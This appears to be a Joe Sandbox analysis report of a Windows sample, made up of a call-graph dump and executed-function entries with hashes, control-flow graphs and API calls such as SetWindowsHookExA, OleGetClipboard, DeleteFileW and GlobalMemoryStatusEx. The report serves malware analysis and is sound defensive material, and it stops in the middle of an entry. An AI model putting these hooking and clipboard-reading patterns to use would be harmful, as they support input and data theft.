44139->44147 44140 6f3b6d3 44140->44117 44143 6f3b791 44141->44143 44144 6f3b968 OleGetClipboard 44141->44144 44145 6f3b958 OleGetClipboard 44141->44145 44142 6f3b7af 44142->44117 44143->44117 44144->44142 44145->44142 44146->44140 44147->44140 44150 6f3b97d 44148->44150 44151 6f3b9a3 44150->44151 44156 6f3b430 44150->44156 44151->44131 44154 6f3b968 44152->44154 44153 6f3b430 OleGetClipboard 44153->44154 44154->44153 44155 6f3b9a3 44154->44155 44155->44131 44157 6f3ba10 OleGetClipboard 44156->44157 44159 6f3baaa 44157->44159 44160 3210848 44162 321084e 44160->44162 44161 321091b 44162->44161 44165 3211340 44162->44165 44191 3211458 44162->44191 44167 3211343 44165->44167 44168 32112c8 44165->44168 44166 3211454 44166->44162 44167->44166 44169 3211458 8 API calls 44167->44169 44217 32180f3 44167->44217 44221 3218219 44167->44221 44226 6f3325d 44167->44226 44232 6f3322d 44167->44232 44238 6f3324d 44167->44238 44244 6f33229 44167->44244 44250 6f33249 44167->44250 44256 6f3323d 44167->44256 44262 6f33245 44167->44262 44268 6f33221 44167->44268 44274 6f33241 44167->44274 44280 6f3321d 44167->44280 44286 6f332b0 44167->44286 44292 6f33255 44167->44292 44298 6f33278 44167->44298 44304 6f33239 44167->44304 44310 6f33259 44167->44310 44316 6f33235 44167->44316 44322 6f33251 44167->44322 44328 6f33225 44167->44328 44334 6f33231 44167->44334 44168->44162 44169->44167 44193 3211356 44191->44193 44194 321145f 44191->44194 44192 3211454 44192->44162 44193->44192 44195 6f33251 4 API calls 44193->44195 44196 6f33231 4 API calls 44193->44196 44197 6f332b0 4 API calls 44193->44197 44198 6f33255 4 API calls 44193->44198 44199 6f33235 4 API calls 44193->44199 44200 6f33259 4 API calls 44193->44200 44201 6f33239 4 API calls 44193->44201 44202 6f33278 4 API calls 44193->44202 44203 6f3325d 4 API calls 44193->44203 44204 6f3323d 4 API calls 44193->44204 44205 6f3321d 4 API calls 44193->44205 44206 6f33241 4 API calls 44193->44206 44207 6f33221 4 API calls 44193->44207 44208 6f33245 4 API calls 44193->44208 44209 6f33225 4 API calls 44193->44209 44210 6f33249 4 API calls 44193->44210 44211 6f33229 4 API calls 44193->44211 44212 6f3324d 4 API calls 44193->44212 44213 6f3322d 4 API calls 44193->44213 44214 32180f3 DeleteFileW 44193->44214 44215 3218219 3 API calls 44193->44215 44216 3211458 8 API calls 44193->44216 44194->44162 44195->44193 44196->44193 44197->44193 44198->44193 44199->44193 44200->44193 44201->44193 44202->44193 44203->44193 44204->44193 44205->44193 44206->44193 44207->44193 44208->44193 44209->44193 44210->44193 44211->44193 44212->44193 44213->44193 44214->44193 44215->44193 44216->44193 44218 321809b DeleteFileW 44217->44218 44220 32180fa 44217->44220 44219 32180bf 44218->44219 44219->44167 44220->44167 44222 3218223 44221->44222 44223 32182d9 44222->44223 44340 6f4fa80 44222->44340 44345 6f4fa70 44222->44345 44223->44167 44227 6f33233 44226->44227 44229 6f33373 44227->44229 44350 6f32fe4 44227->44350 44229->44167 44230 6f33339 44355 6f33004 44230->44355 44233 6f33233 44232->44233 44234 6f32fe4 3 API calls 44233->44234 44236 6f33373 44233->44236 44235 6f33339 44234->44235 44237 6f33004 KiUserCallbackDispatcher 44235->44237 44236->44167 44237->44236 44239 6f33233 44238->44239 44240 6f32fe4 3 API calls 44239->44240 44242 6f33373 44239->44242 44241 6f33339 44240->44241 44243 6f33004 KiUserCallbackDispatcher 44241->44243 44242->44167 44243->44242 44245 6f33233 44244->44245 44246 6f32fe4 3 API calls 44245->44246 44247 6f33373 44245->44247 44248 6f33339 44246->44248 44247->44167 44249 6f33004 KiUserCallbackDispatcher 44248->44249 44249->44247 44251 6f33233 44250->44251 44252 6f32fe4 3 API calls 44251->44252 44254 6f33373 44251->44254 44253 6f33339 44252->44253 44255 6f33004 KiUserCallbackDispatcher 44253->44255 44254->44167 44255->44254 44257 6f33233 44256->44257 44258 6f32fe4 3 API calls 44257->44258 44261 6f33373 44257->44261 44259 6f33339 44258->44259 44260 6f33004 KiUserCallbackDispatcher 44259->44260 44260->44261 44261->44167 44263 6f33233 44262->44263 44264 6f32fe4 3 API calls 44263->44264 44267 6f33373 44263->44267 44265 6f33339 44264->44265 44266 6f33004 KiUserCallbackDispatcher 44265->44266 44266->44267 44267->44167 44269 6f33233 44268->44269 44270 6f32fe4 3 API calls 44269->44270 44272 6f33373 44269->44272 44271 6f33339 44270->44271 44273 6f33004 KiUserCallbackDispatcher 44271->44273 44272->44167 44273->44272 44275 6f33233 44274->44275 44276 6f32fe4 3 API calls 44275->44276 44278 6f33373 44275->44278 44277 6f33339 44276->44277 44279 6f33004 KiUserCallbackDispatcher 44277->44279 44278->44167 44279->44278 44281 6f33233 44280->44281 44282 6f32fe4 3 API calls 44281->44282 44284 6f33373 44281->44284 44283 6f33339 44282->44283 44285 6f33004 KiUserCallbackDispatcher 44283->44285 44284->44167 44285->44284 44287 6f332c2 44286->44287 44288 6f32fe4 3 API calls 44287->44288 44290 6f33373 44287->44290 44289 6f33339 44288->44289 44291 6f33004 KiUserCallbackDispatcher 44289->44291 44290->44167 44291->44290 44293 6f33233 44292->44293 44294 6f32fe4 3 API calls 44293->44294 44296 6f33373 44293->44296 44295 6f33339 44294->44295 44297 6f33004 KiUserCallbackDispatcher 44295->44297 44296->44167 44297->44296 44299 6f33233 44298->44299 44299->44298 44300 6f32fe4 3 API calls 44299->44300 44302 6f33373 44299->44302 44301 6f33339 44300->44301 44303 6f33004 KiUserCallbackDispatcher 44301->44303 44302->44167 44303->44302 44305 6f33233 44304->44305 44306 6f32fe4 3 API calls 44305->44306 44308 6f33373 44305->44308 44307 6f33339 44306->44307 44309 6f33004 KiUserCallbackDispatcher 44307->44309 44308->44167 44309->44308 44311 6f33233 44310->44311 44312 6f32fe4 3 API calls 44311->44312 44314 6f33373 44311->44314 44313 6f33339 44312->44313 44315 6f33004 KiUserCallbackDispatcher 44313->44315 44314->44167 44315->44314 44317 6f33233 44316->44317 44318 6f32fe4 3 API calls 44317->44318 44320 6f33373 44317->44320 44319 6f33339 44318->44319 44321 6f33004 KiUserCallbackDispatcher 44319->44321 44320->44167 44321->44320 44323 6f33233 44322->44323 44324 6f32fe4 3 API calls 44323->44324 44325 6f33373 44323->44325 44326 6f33339 44324->44326 44325->44167 44327 6f33004 KiUserCallbackDispatcher 44326->44327 44327->44325 44329 6f33233 44328->44329 44330 6f32fe4 3 API calls 44329->44330 44332 6f33373 44329->44332 44331 6f33339 44330->44331 44333 6f33004 KiUserCallbackDispatcher 44331->44333 44332->44167 44333->44332 44336 6f33233 44334->44336 44335 6f33373 44335->44167 44336->44335 44337 6f32fe4 3 API calls 44336->44337 44338 6f33339 44337->44338 44339 6f33004 KiUserCallbackDispatcher 44338->44339 44339->44335 44341 6f4fa95 44340->44341 44342 6f4fca6 44341->44342 44343 6f4fcd1 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 44341->44343 44344 6f4fcc1 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 44341->44344 44342->44223 44343->44341 44344->44341 44346 6f4fa95 44345->44346 44347 6f4fca6 44346->44347 44348 6f4fcd1 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 44346->44348 44349 6f4fcc1 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 44346->44349 44347->44223 44348->44346 44349->44346 44351 6f32fef 44350->44351 44359 6f34453 44351->44359 44371 6f34468 44351->44371 44352 6f33512 44352->44230 44356 6f3300f 44355->44356 44358 6f3afeb 44356->44358 44414 6f39a6c 44356->44414 44358->44229 44360 6f3446e 44359->44360 44383 6f337bc 44360->44383 44363 6f34516 44366 6f34542 44363->44366 44391 6f337cc 44363->44391 44368 6f337bc GetModuleHandleW 44368->44363 44372 6f3446e 44371->44372 44373 6f337bc GetModuleHandleW 44372->44373 44374 6f344fa 44373->44374 44381 6f34939 GetModuleHandleW 44374->44381 44382 6f337bc GetModuleHandleW 44374->44382 44375 6f34516 44376 6f337cc GetModuleHandleW 44375->44376 44378 6f34542 44375->44378 44377 6f34586 44376->44377 44379 6f35f2e CreateWindowExW 44377->44379 44380 6f35eed CreateWindowExW 44377->44380 44379->44378 44380->44378 44381->44375 44382->44375 44384 6f337c7 44383->44384 44385 6f344fa 44384->44385 44405 6f34b71 44384->44405 44385->44368 44387 6f34939 44385->44387 44388 6f34948 44387->44388 44389 6f34953 44388->44389 44390 6f34b71 GetModuleHandleW 44388->44390 44389->44363 44390->44389 44392 6f34e90 GetModuleHandleW 44391->44392 44394 6f34586 44392->44394 44395 6f35eed 44394->44395 44400 6f35f2e 44394->44400 44396 6f35f25 44395->44396 44397 6f35ef1 44395->44397 44396->44397 44398 6f35ffb CreateWindowExW 44396->44398 44397->44366 44399 6f3605c 44398->44399 44401 6f35f32 CreateWindowExW 44400->44401 44402 6f35efc 44400->44402 44404 6f3605c 44401->44404 44402->44366 44406 6f337cc GetModuleHandleW 44405->44406 44407 6f34b89 44406->44407 44408 6f337cc GetModuleHandleW 44407->44408 44409 6f34d54 44407->44409 44410 6f34cda 44408->44410 44409->44385 44410->44409 44411 6f337cc GetModuleHandleW 44410->44411 44412 6f34d28 44411->44412 44412->44409 44413 6f337cc GetModuleHandleW 44412->44413 44413->44409 44415 6f3b000 KiUserCallbackDispatcher 44414->44415 44417 6f3b06e 44415->44417 44417->44356 44427 6f34e8a 44428 6f34ed2 44427->44428 44429 6f34ed8 GetModuleHandleW 44427->44429 44428->44429 44430 6f34f05 44429->44430 44431 6f3d609 44432 6f3d59b 44431->44432 44435 6f3d617 44431->44435 44433 6f3d5b9 SetWindowsHookExA 44432->44433 44432->44435 44434 6f3d5da 44433->44434 44418 6f3b878 44419 6f3b883 44418->44419 44420 6f3b893 44419->44420 44422 6f3b318 44419->44422 44423 6f3b8c8 OleInitialize 44422->44423 44424 6f3b92c 44423->44424 44424->44420 44425 6f39e38 DuplicateHandle 44426 6f39ece 44425->44426

                                Executed Functions

                                Function 06F456A8 Relevance: 1.8, Strings: 1, Instructions: 587COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 0000000F.00000002.3902189949.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_15_2_6f40000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID: $
                                • API String ID: 0-3993045852
                                • Opcode ID: 720071a50f236250fd6ea713bbbc59ce33d5cb7ebbebf043fae972c74b4f10e1
                                • Instruction ID: fdb3bd20843ab26552811f2e637f72c2d452998b9bd0833877f80f3b9db79e22
                                • Opcode Fuzzy Hash: 720071a50f236250fd6ea713bbbc59ce33d5cb7ebbebf043fae972c74b4f10e1
                                • Instruction Fuzzy Hash: F622B075E042188FDF64EBA8C4846AEBFB2EF89320F248569D415AB744DB35DC45CB90
                                Function 06F42710 Relevance: 1.1, Instructions: 1069COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000F.00000002.3902189949.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_15_2_6f40000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f0be5787179d57a280d6fdb35c06750b8e34f536290f773e68cd9c3147dcd0be
                                • Instruction ID: de06d0e62edee14d47b83d1d36d23fd51277a23801ba365d26e950d19dea5f93
                                • Opcode Fuzzy Hash: f0be5787179d57a280d6fdb35c06750b8e34f536290f773e68cd9c3147dcd0be
                                • Instruction Fuzzy Hash: 08A22434E002088FDB64EB69C584B9DBBB2FB49314F5584A9E409EB761DB35ED85CF80
                                Function 06F46700 Relevance: .8, Instructions: 826COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000F.00000002.3902189949.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_15_2_6f40000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: eacb6f045cb55e34373004c85487461bc5b85dd407f721624dcd917d8de7bf0d
                                • Instruction ID: df8b8aa9fbf842e4547dffc40c4cd3a90e0095d94c7ec031f2d0944a85c3909c
                                • Opcode Fuzzy Hash: eacb6f045cb55e34373004c85487461bc5b85dd407f721624dcd917d8de7bf0d
                                • Instruction Fuzzy Hash: 94627C34E002048FDB54EB68D594BAEBBB2EF89310F248469D916DB790DB35ED45CB90
                                Function 06F43578 Relevance: .5, Instructions: 545COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000F.00000002.3902189949.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_15_2_6f40000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b2e02a3c0d7f160b11b378cd5f60f95b7e98d4dd995517347eba43f6bdcd65b8
                                • Instruction ID: 7f80ceda1f6e515ec4bb4a9c8e7155c939b9a052863a952f76818b5d282dd49a
                                • Opcode Fuzzy Hash: b2e02a3c0d7f160b11b378cd5f60f95b7e98d4dd995517347eba43f6bdcd65b8
                                • Instruction Fuzzy Hash: 3D322D35E10719CFDB14EB69C8906ADF7B6FF89300F60C669D409AB650EF70A985CB90
                                Function 06F47E90 Relevance: .5, Instructions: 472COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000F.00000002.3902189949.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_15_2_6f40000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d499d592b4d49b9c6ce864a460ebd57dd2157a37949577a6753cf769af31be8c
                                • Instruction ID: 92567c86e0feef4af2edb1cd37ce0ecb04ce66f56f3b48ebbeb976bd431e167f
                                • Opcode Fuzzy Hash: d499d592b4d49b9c6ce864a460ebd57dd2157a37949577a6753cf769af31be8c
                                • Instruction Fuzzy Hash: 63027D34F003158FDB54EB68D8906AEBBB6FF88340F548529D5269B751DB35EC82CB90
                                Function 06F35EED Relevance: 1.7, APIs: 1, Instructions: 151COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 281 6f35eed-6f35eef 282 6f35ef1-6f35efa 281->282 283 6f35f25-6f35f30 281->283 285 6f35efc-6f35f01 282->285 284 6f35f32-6f35f34 283->284 283->285 286 6f35f70-6f35f9e 284->286 287 6f35f36-6f35f6d 284->287 288 6f35f03-6f35f05 285->288 289 6f35f07-6f35f09 285->289 291 6f35fa0-6f35fa6 286->291 292 6f35fa9-6f35fb0 286->292 287->286 288->289 293 6f35f0b-6f35f0d 289->293 294 6f35f0f-6f35f11 289->294 291->292 297 6f35fb2-6f35fb8 292->297 298 6f35fbb-6f3605a CreateWindowExW 292->298 293->294 295 6f35f13-6f35f15 294->295 296 6f35f17-6f35f1e call 6f338dc 294->296 295->296 297->298 302 6f36063-6f3609b 298->302 303 6f3605c-6f36062 298->303 307 6f360a8 302->307 308 6f3609d-6f360a0 302->308 303->302 309 6f360a9 307->309 308->307 309->309
                                APIs
                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06F3604A
                                Memory Dump Source
                                • Source File: 0000000F.00000002.3901794104.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_15_2_6f30000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID: CreateWindow
                                • String ID:
                                • API String ID: 716092398-0
                                • Opcode ID: 29483f7e3ad8640fcef7ef19f9ae8b5bd9e76e683df2f54c30379e9186395882
                                • Instruction ID: b295b1bdc9d0cbe6b21e5129bf39d2cc9649e8df2ca01177b6816a8bc1856787
                                • Opcode Fuzzy Hash: 29483f7e3ad8640fcef7ef19f9ae8b5bd9e76e683df2f54c30379e9186395882
                                • Instruction Fuzzy Hash: 1351FFB1C04259AFDF15CFA9D884ADDBFB1BF89350F24816AE808AB220D7719855CF90
                                Function 032180F3 Relevance: 1.6, APIs: 1, Instructions: 119fileCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 310 32180f3-32180f8 311 321809b-32180bd DeleteFileW 310->311 312 32180fa-3218115 310->312 314 32180c6-32180ee 311->314 315 32180bf-32180c5 311->315 316 3218117-321811a 312->316 315->314 319 321814d-3218150 316->319 320 321811c-3218130 316->320 321 3218152-3218159 319->321 322 3218164-3218167 319->322 328 3218132-3218134 320->328 329 3218136 320->329 324 3218328-321832f 321->324 325 321815f 321->325 326 3218177-321817a 322->326 327 3218169 call 3218b60 322->327 330 3218331 324->330 331 321833e-3218345 324->331 325->322 332 32181b6-32181b8 326->332 333 321817c-32181b1 326->333 337 321816f-3218172 327->337 336 3218139-3218148 328->336 329->336 349 3218331 call 321f5a9 330->349 350 3218331 call 321f6e8 330->350 334 32181ba 332->334 335 32181bf-32181c2 332->335 333->332 334->335 335->316 338 32181c8-32181d7 335->338 336->319 337->326 342 3218201-3218216 338->342 343 32181d9-32181dc 338->343 339 3218337 339->331 342->324 345 32181e4-32181ff 343->345 345->342 345->343 349->339 350->339
                                APIs
                                • DeleteFileW.KERNEL32(00000000), ref: 032180B0
                                Memory Dump Source
                                • Source File: 0000000F.00000002.3859634733.0000000003210000.00000040.00000800.00020000.00000000.sdmp, Offset: 03210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_15_2_3210000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID: DeleteFile
                                • String ID:
                                • API String ID: 4033686569-0
                                • Opcode ID: 0d8aa1c1d004c6e2b9719e97806ab09a28ead7ef4745a487720456c34c56e52b
                                • Instruction ID: 8eefdc092eb152bba0d7de7e0f071eac8b7a959c72a51a2e5eedc84321d59227
                                • Opcode Fuzzy Hash: 0d8aa1c1d004c6e2b9719e97806ab09a28ead7ef4745a487720456c34c56e52b
                                • Instruction Fuzzy Hash: 74418E71E2030A8BDF20CFA5C98079EBBF5EF55710F148469E905EB240E7B5A895CB90
                                Function 06F35F2E Relevance: 1.6, APIs: 1, Instructions: 118COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 351 6f35f2e-6f35f30 352 6f35f32-6f35f34 351->352 353 6f35efc-6f35f01 351->353 354 6f35f70-6f35f9e 352->354 355 6f35f36-6f35f6d 352->355 356 6f35f03-6f35f05 353->356 357 6f35f07-6f35f09 353->357 359 6f35fa0-6f35fa6 354->359 360 6f35fa9-6f35fb0 354->360 355->354 356->357 361 6f35f0b-6f35f0d 357->361 362 6f35f0f-6f35f11 357->362 359->360 365 6f35fb2-6f35fb8 360->365 366 6f35fbb-6f3605a CreateWindowExW 360->366 361->362 363 6f35f13-6f35f15 362->363 364 6f35f17-6f35f1e call 6f338dc 362->364 363->364 365->366 370 6f36063-6f3609b 366->370 371 6f3605c-6f36062 366->371 375 6f360a8 370->375 376 6f3609d-6f360a0 370->376 371->370 377 6f360a9 375->377 376->375 377->377
                                APIs
                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06F3604A
                                Memory Dump Source
                                • Source File: 0000000F.00000002.3901794104.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_15_2_6f30000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID: CreateWindow
                                • String ID:
                                • API String ID: 716092398-0
                                • Opcode ID: fca6a511de3fed89d10d99030edfeb65e70f99f1ed51f4816a8358bdab9ba60f
                                • Instruction ID: 526451ff1865e95e1d27c1c9ee93060e710b52f8d4fbc583011949fc082f15bd
                                • Opcode Fuzzy Hash: fca6a511de3fed89d10d99030edfeb65e70f99f1ed51f4816a8358bdab9ba60f
                                • Instruction Fuzzy Hash: A251B0B5D00359AFDB14CFA9D884ADEFFB5BF88310F24812AE818AB210D7759945CF90
                                Function 06F35F38 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 378 6f35f38-6f35f9e 380 6f35fa0-6f35fa6 378->380 381 6f35fa9-6f35fb0 378->381 380->381 382 6f35fb2-6f35fb8 381->382 383 6f35fbb-6f35ff3 381->383 382->383 384 6f35ffb-6f3605a CreateWindowExW 383->384 385 6f36063-6f3609b 384->385 386 6f3605c-6f36062 384->386 390 6f360a8 385->390 391 6f3609d-6f360a0 385->391 386->385 392 6f360a9 390->392 391->390 392->392
                                APIs
                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06F3604A
                                Memory Dump Source
                                • Source File: 0000000F.00000002.3901794104.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_15_2_6f30000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID: CreateWindow
                                • String ID:
                                • API String ID: 716092398-0
                                • Opcode ID: e86a6db149d9e1d04ec5ab97012cb472298437be4900db59ad2b1e0805a1c49d
                                • Instruction ID: ac69dec2a2dc0b844e97891014b3919afc8feac62c8606e40551f2607feb26fd
                                • Opcode Fuzzy Hash: e86a6db149d9e1d04ec5ab97012cb472298437be4900db59ad2b1e0805a1c49d
                                • Instruction Fuzzy Hash: 7441A0B1D00319EFDB14CFA9D884ADEBBB5BF48310F24812AE419AB210D7759845CF90
                                Function 0321EE90 Relevance: 1.6, APIs: 1, Instructions: 102COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 393 321ee90-321eeab 394 321eed5-321eeeb 393->394 395 321eead-321eed4 393->395 412 321eeed call 321ef41 394->412 413 321eeed call 321ee90 394->413 414 321eeed call 321ef78 394->414 398 321eef2-321eef4 399 321eef6-321eef9 398->399 400 321eefa-321efec GlobalMemoryStatusEx 398->400 408 321eff5-321f01d 400->408 409 321efee-321eff4 400->409 409->408 412->398 413->398 414->398
                                Memory Dump Source
                                • Source File: 0000000F.00000002.3859634733.0000000003210000.00000040.00000800.00020000.00000000.sdmp, Offset: 03210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_15_2_3210000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3979bc7f1b9f9906f0f00c354ed68a1219137bfd068fdc6de2d357235adf31cc
                                • Instruction ID: 17eb2bf2287846066f972bd7cc518d9a7798dc407dc6df6e0159ccaa75fef338
                                • Opcode Fuzzy Hash: 3979bc7f1b9f9906f0f00c354ed68a1219137bfd068fdc6de2d357235adf31cc
                                • Instruction Fuzzy Hash: 70319932E183558FC701DB74DC042AABBE0EFC6210F1A46A6D808D7281EB788899C7D0
                                Function 06F39A14 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 415 6f39a14-6f3ad04 418 6f3adb4-6f3add4 call 6f33904 415->418 419 6f3ad0a-6f3ad0f 415->419 427 6f3add7-6f3ade4 418->427 421 6f3ad62-6f3ad9a CallWindowProcW 419->421 422 6f3ad11-6f3ad48 419->422 423 6f3ada3-6f3adb2 421->423 424 6f3ad9c-6f3ada2 421->424 428 6f3ad51-6f3ad60 422->428 429 6f3ad4a-6f3ad50 422->429 423->427 424->423 428->427 429->428
                                APIs
                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 06F3AD89
                                Memory Dump Source
                                • Source File: 0000000F.00000002.3901794104.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_15_2_6f30000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID: CallProcWindow
                                • String ID:
                                • API String ID: 2714655100-0
                                • Opcode ID: 41414800d90168cd03a5f69d79ce843784912b216a79d04b0ed9bb9e5aad10f9
                                • Instruction ID: 1c2b7d6ece4b40d8431dc2c599b16d22db3d07e63562b3321357b75ca57d6218
                                • Opcode Fuzzy Hash: 41414800d90168cd03a5f69d79ce843784912b216a79d04b0ed9bb9e5aad10f9
                                • Instruction Fuzzy Hash: 5E415BB5900359CFDB54CF8AC448AAAFBF5FF88314F248459D959AB360D774A840CFA0
                                Function 06F3D609 Relevance: 1.6, APIs: 1, Instructions: 79COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 432 6f3d609-6f3d610 433 6f3d612-6f3d614 432->433 434 6f3d640-6f3d68c call 6f33024 call 6f33034 432->434 435 6f3d617-6f3d63b call 6f33014 433->435 436 6f3d59b-6f3d5af 433->436 435->434 437 6f3d5b1-6f3d5b6 436->437 438 6f3d5b9-6f3d5d8 SetWindowsHookExA 436->438 437->438 441 6f3d5e1-6f3d601 438->441 442 6f3d5da-6f3d5e0 438->442 442->441
                                APIs
                                • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 06F3D5CB
                                Memory Dump Source
                                • Source File: 0000000F.00000002.3901794104.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_15_2_6f30000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID: HookWindows
                                • String ID:
                                • API String ID: 2559412058-0
                                • Opcode ID: c5e3e93f70b02404490eda25609e24fffd16aa0873d9a58b49abf816b1e2f8d7
                                • Instruction ID: f6b95b228e4496b64c7a19fa8a4066e0280de9500f002f4c2eac340365a48188
                                • Opcode Fuzzy Hash: c5e3e93f70b02404490eda25609e24fffd16aa0873d9a58b49abf816b1e2f8d7
                                • Instruction Fuzzy Hash: 9C31E1729043848FCBA5EF69D88079EFBF1EF89314F14885AD059EB291CB34A844CF51
                                Function 06F3B430 Relevance: 1.6, APIs: 1, Instructions: 74comclipboardCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 453 6f3b430-6f3baa8 OleGetClipboard 456 6f3bab1-6f3baff 453->456 457 6f3baaa-6f3bab0 453->457 462 6f3bb01-6f3bb05 456->462 463 6f3bb0f 456->463 457->456 462->463 464 6f3bb07 462->464 465 6f3bb10 463->465 464->463 465->465
                                APIs
                                Memory Dump Source
                                • Source File: 0000000F.00000002.3901794104.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_15_2_6f30000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID: Clipboard
                                • String ID:
                                • API String ID: 220874293-0
                                • Opcode ID: f2b2cf92fbb6922e03d34f9ffe9abaf1f7bd99defde85824cd01c969ecb14658
                                • Instruction ID: 5501994e0b8fb87a454d8e6d6db98cd412a94b98ed28d7cac699b2a82407acc2
                                • Opcode Fuzzy Hash: f2b2cf92fbb6922e03d34f9ffe9abaf1f7bd99defde85824cd01c969ecb14658
                                • Instruction Fuzzy Hash: F63101B0D0171DDFDB60CF99C994BDDBBF5AB48314F208059E804AB290DBB5A844CB95
                                Function 0321EF41 Relevance: 1.6, APIs: 1, Instructions: 70COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 466 321ef41-321ef59 469 321ef5b-321ef5e 466->469 470 321ef5f-321efec GlobalMemoryStatusEx 466->470 473 321eff5-321f01d 470->473 474 321efee-321eff4 470->474 474->473
                                APIs
                                • GlobalMemoryStatusEx.KERNEL32 ref: 0321EFDF
                                Memory Dump Source
                                • Source File: 0000000F.00000002.3859634733.0000000003210000.00000040.00000800.00020000.00000000.sdmp, Offset: 03210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_15_2_3210000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID: GlobalMemoryStatus
                                • String ID:
                                • API String ID: 1890195054-0
                                • Opcode ID: 49969526653a1cdddafcec53374b432c6e0c5f0bb6d63a2b4813c61a5d38c3c0
                                • Instruction ID: 8c1dd22d15de4298780f5d440afb80e5eada2a30250665420320d0dd16ac5c4b
                                • Opcode Fuzzy Hash: 49969526653a1cdddafcec53374b432c6e0c5f0bb6d63a2b4813c61a5d38c3c0
                                • Instruction Fuzzy Hash: FF2189B2C0025A8FDB14DFA9D4487DEFBF0EF48320F1585AAE858A7240D7789945CFA1
                                Function 06F3BA12 Relevance: 1.6, APIs: 1, Instructions: 70comclipboardCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 477 6f3ba12-6f3ba60 478 6f3ba6a-6f3baa8 OleGetClipboard 477->478 479 6f3bab1-6f3baff 478->479 480 6f3baaa-6f3bab0 478->480 485 6f3bb01-6f3bb05 479->485 486 6f3bb0f 479->486 480->479 485->486 487 6f3bb07 485->487 488 6f3bb10 486->488 487->486 488->488
                                APIs
                                Memory Dump Source
